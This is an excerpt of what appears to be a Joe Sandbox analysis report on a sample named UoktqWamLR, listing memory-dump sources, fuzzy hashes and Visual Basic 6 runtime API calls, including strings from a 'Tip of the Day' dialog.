Opcode Fuzzy Hash: 00408d28294f16215a4cb47f84b6fc749005c545bafaa214ea233331ad25dcf0
Instruction Fuzzy Hash: BEB09B3A1655844DD716CF1441537F537555704540B540456D08287656C00C4547D56D

Function 02355E3F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a346d76f7c58118d78dde139ad0323288b41d975eb3cacb1a9f01b0a4c225c2f
Instruction ID: ace3d1d88f54ed43b8ef4b404b91d2feb29500aa8929eb2c2ffcb51d1c0cb161
Opcode Fuzzy Hash: a346d76f7c58118d78dde139ad0323288b41d975eb3cacb1a9f01b0a4c225c2f
Instruction Fuzzy Hash: 0DB0922A4A26944DDB12CB244213AA93B6993014C0FD40481D4814BB6BC0088686DA96

Function 004A74CB Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 403b859c92bb87a22b3b23818d0f9761360f240456280570c354f149d4e95fe8
Instruction ID: 6d8b77ee072ee247f30958288c4a888cb08176c89a0772219baa462f0e89e92b
Opcode Fuzzy Hash: 403b859c92bb87a22b3b23818d0f9761360f240456280570c354f149d4e95fe8
Instruction Fuzzy Hash: 48B09234342640CFC205CE29C180F1473E8BB04A90F0244D0B800CB662C228ED80DA10

Function 004A74E0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c43a5081fe5d2bb3cd1689569c8f68dab492a46559b42270ac0312c03ebc32d
Instruction ID: 95dff2fb833417202495218693bf5b1a421dd4471ca0001524ddc04ad995461f
Opcode Fuzzy Hash: 4c43a5081fe5d2bb3cd1689569c8f68dab492a46559b42270ac0312c03ebc32d
Instruction Fuzzy Hash: 46B0123F0716C44DDB13CF3442137E93B6593004C0F5404C1D0C04B66BC00C8687D556

Function 004BCD25 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b625a31192cdba39f244c3a7b2c9e608bd2f6f541c8760a5abf4e0cc5e8cee3
Instruction ID: 1b24b7927bf96a24aa06c7982f721f4bd44d18806ebfed4b0eb72b6ec204062f
Opcode Fuzzy Hash: 3b625a31192cdba39f244c3a7b2c9e608bd2f6f541c8760a5abf4e0cc5e8cee3
Instruction Fuzzy Hash: 4EB0923957A5C48DD72A8B1880A37EA3B2AA301A00B2005A7C4834B71AD5084443E56F

Function 004A74F4 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09929421d99742cfa4a401d3ddfe35bd1712795acecd8ac35f43a2c4d427f48e
Instruction ID: 75d8ee55a9432d655d400c20f764b696a43bdfdc0ccd3be24d65f6ea96f8add4
Opcode Fuzzy Hash: 09929421d99742cfa4a401d3ddfe35bd1712795acecd8ac35f43a2c4d427f48e
Instruction Fuzzy Hash: 0CB012241015C18EC9024F1041127A877A0D7019C0F0A00C494C04B513C11C8645A610

Function 02357D3D Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7243410bf63ae74259ed75016768b055e95cc34dc1bb8327bc4ee2ac82c6c069
Instruction ID: b716f337e223803d9bf9056da0dfa28dece22195c761cbac3913b183491e9135
Opcode Fuzzy Hash: 7243410bf63ae74259ed75016768b055e95cc34dc1bb8327bc4ee2ac82c6c069
Instruction Fuzzy Hash: FCC04C34216950CFC259DB10C5A4EA43336BB94644F6441BCC80A0F6425F376A47CA00

Function 004BCC84 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5253fc64d418cf8d330c0c384c5060f749f367f649a558d998fe79eb65a007d0
Instruction ID: 08941c060161a8336f4e7577b21a9328f68bf2f8b4f76229ee55399738ef1da0
Opcode Fuzzy Hash: 5253fc64d418cf8d330c0c384c5060f749f367f649a558d998fe79eb65a007d0
Instruction Fuzzy Hash: EEA0127058B840C1C549990940907B161B05300700F200057A00381440650C4503742F

Function 02357735 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1005a243bdb32d9e7159bd4fa16919ed6e83318095ae153ebf3549350c2b027
Instruction ID: c5e8bae2c6636b37d6280c499ae5851068675df5fbe86f63e46ff6bff1c81faf
Opcode Fuzzy Hash: a1005a243bdb32d9e7159bd4fa16919ed6e83318095ae153ebf3549350c2b027
Instruction Fuzzy Hash: F5B00235259960CFC29A8B06D195E70B3BDF711741F4514F5F48A8FD62D3299D01CA15

Function 004BCCBC Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a879f20721cad36ef649cb569320bbe7707a8430c50e85f3a32086f98484d676
Instruction ID: f0ad6341153dc1e1b8a8c6db723bec97b03b72d468f4765e1742ad1b38160250
Opcode Fuzzy Hash: a879f20721cad36ef649cb569320bbe7707a8430c50e85f3a32086f98484d676
Instruction Fuzzy Hash: 0EA012341094C089C30F4B0440A16607BB05718700F050055D05F83601810855019414

Function 004BCB9B Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c88d3fc5a209bfe47f9c555be498774a5864771ea9329a91ed443ae34172d73a
Instruction ID: cbf0370656bfccada4697519865069d22944f1549d8b014d27acf67daecb72b8
Opcode Fuzzy Hash: c88d3fc5a209bfe47f9c555be498774a5864771ea9329a91ed443ae34172d73a
Instruction Fuzzy Hash: 1CA022322088E0C2C28EC22880E03B232B0A30CB00F30003BB803C3880C23C2A03B03E

Function 02356834 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c631e839c2816014f05a94e393ed350118c38a3b74f2b79a5bbf6c8b63331fa
Instruction ID: a8212114be1fd65a49839b719b8db344ca35bf7fc217f0b8dba079a80d3ba1dc
Opcode Fuzzy Hash: 3c631e839c2816014f05a94e393ed350118c38a3b74f2b79a5bbf6c8b63331fa
Instruction Fuzzy Hash: 7DA022380028C08EC2038B208220B30BBF0A300AC0F0A00C0E8C08BA03C00CC200E820

Function 02357827 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11de9bd38a5c2926ded7b2d4b88b15b2b2fc0c9abcacdb480970c4d1b6ebedb8
Instruction ID: 664596a35e724026edb28b2439cded2094121dbb8e0adb39b0c312cc4a57852d
Opcode Fuzzy Hash: 11de9bd38a5c2926ded7b2d4b88b15b2b2fc0c9abcacdb480970c4d1b6ebedb8
Instruction Fuzzy Hash: 5FB00235165551CFC255CB45C195F6073B8F714741F4515F1E8054BD53C3349940C951

Function 023577B7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 461c3e1164e184370a7fcaee4ad91e2c64327133319292e0d543075a40d27e2d
Instruction ID: 571efbef654c22d07f7782f56988374ad57835122d54682a6cf50c7556e81d05
Opcode Fuzzy Hash: 461c3e1164e184370a7fcaee4ad91e2c64327133319292e0d543075a40d27e2d
Instruction Fuzzy Hash: 70B00275165951CFC2958B0AC554E5073B8B704645F4614E0E5055B952C324A904C904

Function 023575A8 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5cb656c6f0c5c528d94e3245842e582c1717cd52d518e0f02656187cbb65317
Instruction ID: 6effef86f93bcea52c59c6e313db030135291f14c5b0fecf0cfedf98451bea60
Opcode Fuzzy Hash: f5cb656c6f0c5c528d94e3245842e582c1717cd52d518e0f02656187cbb65317
Instruction Fuzzy Hash: 67B01230119CC0CFC241CB05C140F2073B9F704B02F0208F0F4064BD12C3789800C900

Function 023573F4 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 608ff2f7adf9c6d4681ed07a86add390bd22471e77fa6dba97efdd11c7e6e019
Instruction ID: 083163092989c00f7b726e6d1c5b96e5fd6e20435485beb51bdb850849a0b3f5
Opcode Fuzzy Hash: 608ff2f7adf9c6d4681ed07a86add390bd22471e77fa6dba97efdd11c7e6e019
Instruction Fuzzy Hash: 4BB002351666D0CFC256DB05C155F7173B8F704645F4514F1E4054BD52D3789900C905

Function 023578F3 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 638c6b87f5638a12406e32795b89245882b412fe6ffbb3e06710fc7a8eb16105
Instruction ID: f812c086ebbe3fcee4e0c7ab7b31365154552bb7b5a5c84c3c8411a302123d88
Opcode Fuzzy Hash: 638c6b87f5638a12406e32795b89245882b412fe6ffbb3e06710fc7a8eb16105
Instruction Fuzzy Hash: 99B00135266980CFC296CB0AC194F5073F8FB04A41F4655F1E4459BAA2CB38A940CB40

Function 023575E1 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81da5efbcad4fce89d47f1bf7bd95df121564874bc0b044fa2fc0c958405c429
Instruction ID: 11dbdfb89cf45435a296228df594b4a083c8197b63b8ca7482326550d8ea7202
Opcode Fuzzy Hash: 81da5efbcad4fce89d47f1bf7bd95df121564874bc0b044fa2fc0c958405c429
Instruction Fuzzy Hash: F3B00135266980CFC296CB0AC294F5073F8FB44A41F4A64F0E4458BA66C738AA00CA40

Function 004FE930 Relevance: 94.8, APIs: 46, Strings: 8, Instructions: 326COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0040C9C4,00503BA8), ref: 004FE9A5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C9B4,00000014), ref: 004FE9C9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040CC50,00000058), ref: 004FE9EC
#689.MSVBVM60(?,Options,Show Tips at Startup), ref: 004FEA18
__vbaStrMove.MSVBVM60(?,Options,Show Tips at Startup), ref: 004FEA22
__vbaI4Str.MSVBVM60(00000000,?,Options,Show Tips at Startup), ref: 004FEA28
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,Options,Show Tips at Startup), ref: 004FEA39
__vbaFreeObj.MSVBVM60(?,Options,Show Tips at Startup), ref: 004FEA44
__vbaNew2.MSVBVM60(0040C9C4,00503BA8,?,Options,Show Tips at Startup), ref: 004FEA61
__vbaObjSetAddref.MSVBVM60(?,005023D0,?,Options,Show Tips at Startup), ref: 004FEA79
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C9B4,00000010), ref: 004FEA9C
__vbaObjSet.MSVBVM60(?,00000000), ref: 004FEAB4
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040CCA4,000000E4), ref: 004FEAD8
__vbaFreeObj.MSVBVM60(00000000,00000000,0040CCA4,000000E4), ref: 004FEAE0
#594.MSVBVM60(?), ref: 004FEAF7
__vbaFreeVar.MSVBVM60(?), ref: 004FEAFF
__vbaNew2.MSVBVM60(0040C9C4,00503BA8,?), ref: 004FEB16
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C9B4,00000014), ref: 004FEB3A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040CC50,00000050), ref: 004FEB5D
__vbaStrCat.MSVBVM60(0040C440,?), ref: 004FEB6A
__vbaStrMove.MSVBVM60(0040C440,?), ref: 004FEB74
__vbaStrCat.MSVBVM60(TIPOFDAY.TXT,00000000,0040C440,?), ref: 004FEB80
__vbaStrMove.MSVBVM60(TIPOFDAY.TXT,00000000,0040C440,?), ref: 004FEB8A
__vbaHresultCheckObj.MSVBVM60(00000000,005023D0,0040CB70,000006F8), ref: 004FEBB0
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004FEBD0
__vbaFreeObj.MSVBVM60(?,?,?,00000000,005023D0,0040CB70,000006F8), ref: 004FEBDB
__vbaObjSet.MSVBVM60(?,00000000), ref: 004FEBF7
__vbaStrCat.MSVBVM60(TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC07
__vbaStrMove.MSVBVM60(TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC11
__vbaStrCat.MSVBVM60( file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC1C
__vbaStrMove.MSVBVM60( file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC26
__vbaStrCat.MSVBVM60(0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC32
__vbaStrMove.MSVBVM60(0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC3C
__vbaStrCat.MSVBVM60(0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC43
__vbaStrMove.MSVBVM60(0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC4D
__vbaStrCat.MSVBVM60(Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC58
__vbaStrMove.MSVBVM60(Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC62
__vbaStrCat.MSVBVM60(TIPOFDAY.TXT,00000000,Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC69
__vbaStrMove.MSVBVM60(TIPOFDAY.TXT,00000000,Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC73
__vbaStrCat.MSVBVM60( using NotePad with 1 tip per line. ,00000000,TIPOFDAY.TXT,00000000,Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC7E
__vbaStrMove.MSVBVM60( using NotePad with 1 tip per line. ,00000000,TIPOFDAY.TXT,00000000,Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC88
__vbaStrCat.MSVBVM60(Then place it in the same directory as the application. ,00000000, using NotePad with 1 tip per line. ,00000000,TIPOFDAY.TXT,00000000,Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ), ref: 004FEC93
__vbaStrMove.MSVBVM60(Then place it in the same directory as the application. ,00000000, using NotePad with 1 tip per line. ,00000000,TIPOFDAY.TXT,00000000,Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ), ref: 004FEC9D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040CE08,00000054), ref: 004FECBA
__vbaFreeStrList.MSVBVM60(00000008,?,?,?,?,?,?,?,?), ref: 004FECE1
__vbaFreeObj.MSVBVM60(?,?,?,?,?,00000000,?,0040CE08,00000054), ref: 004FECEC

Strings

That the , xrefs: 004FEBFE
Show Tips at Startup, xrefs: 004FEA07
Create a text file named , xrefs: 004FEC53
Options, xrefs: 004FEA0F
file was not found? , xrefs: 004FEC17
using NotePad with 1 tip per line. , xrefs: 004FEC79
TIPOFDAY.TXT, xrefs: 004FEB79, 004FEB7F, 004FEC03, 004FEC68
Then place it in the same directory as the application. , xrefs: 004FEC8E

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$Move$CheckFreeHresult$ListNew2$#594#689Addref
String ID: file was not found? $ using NotePad with 1 tip per line. $Create a text file named $Options$Show Tips at Startup$TIPOFDAY.TXT$That the $Then place it in the same directory as the application.
API String ID: 1089064309-206723237
Opcode ID: 883fe2a7b846041538374f6b38acfb74f096eaae437b42eb5eb8f2847a28bb15
Instruction ID: 13b58d9a19421793fd7212617565c22be8a719070ab75131cc42dff294c54b91
Opcode Fuzzy Hash: 883fe2a7b846041538374f6b38acfb74f096eaae437b42eb5eb8f2847a28bb15
Instruction Fuzzy Hash: 37B14471D40208BBCB04EBA5DC85EEE77BDAF18704F14413BF615BB1E1DA7859058BA8

Function 004FC18F Relevance: 54.3, APIs: 36, Instructions: 305COMMON

Download Yara Rule

APIs

__vbaVarVargNofree.MSVBVM60(0040BEAC,?,00000000,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC1E0
__vbaStrVarCopy.MSVBVM60(00000000,0040BEAC,?,00000000,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC1E6
__vbaStrMove.MSVBVM60(00000000,0040BEAC,?,00000000,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC1F0
__vbaNew2.MSVBVM60(00409904,?,00000000,0040BEAC,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004FC215
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BDB8,0000001C,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC237
__vbaStrToAnsi.MSVBVM60(?,?,00000018,00000000,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC24D
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000000), ref: 004FC25F
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 004FC279
__vbaNew2.MSVBVM60(00409904,?,?,00000018,00000000,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC298
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BDB8,0000001C,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC2B5
__vbaStrToAnsi.MSVBVM60(?,?,00000018,00000008,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC2C5
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000008), ref: 004FC2D7
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000008), ref: 004FC2F1
__vbaNew2.MSVBVM60(00409904,?,00000000,00000000,?,?,00000018,00000008), ref: 004FC310
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BDB8,00000020,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC32D
__vbaStrToAnsi.MSVBVM60(?,?,00000018,00000000,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC33C
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000000), ref: 004FC34E
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 004FC368
__vbaNew2.MSVBVM60(00409904,?,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 004FC383
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BDB8,00000020,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 004FC3A0
__vbaStrToAnsi.MSVBVM60(?,?,00000018,00000008,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 004FC3B0
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000008,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 004FC3C2
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000008,?,?,?,00000000,00000000,?), ref: 004FC3DC
__vbaSetSystemError.MSVBVM60(?,00008003,00000000,00000000,00401006,?,00000018,00000000), ref: 004FC400
__vbaLenBstr.MSVBVM60(?,00000000,?,00008003,00000000,00000000,00401006,?,00000018,00000000), ref: 004FC409
__vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00008003,00000000,00000000,00401006,?,00000018,00000000), ref: 004FC416
__vbaSetSystemError.MSVBVM60(00401006,00000000,?,?,00000000,?,00000000,?,00008003,00000000,00000000,00401006,?,00000018,00000000), ref: 004FC424
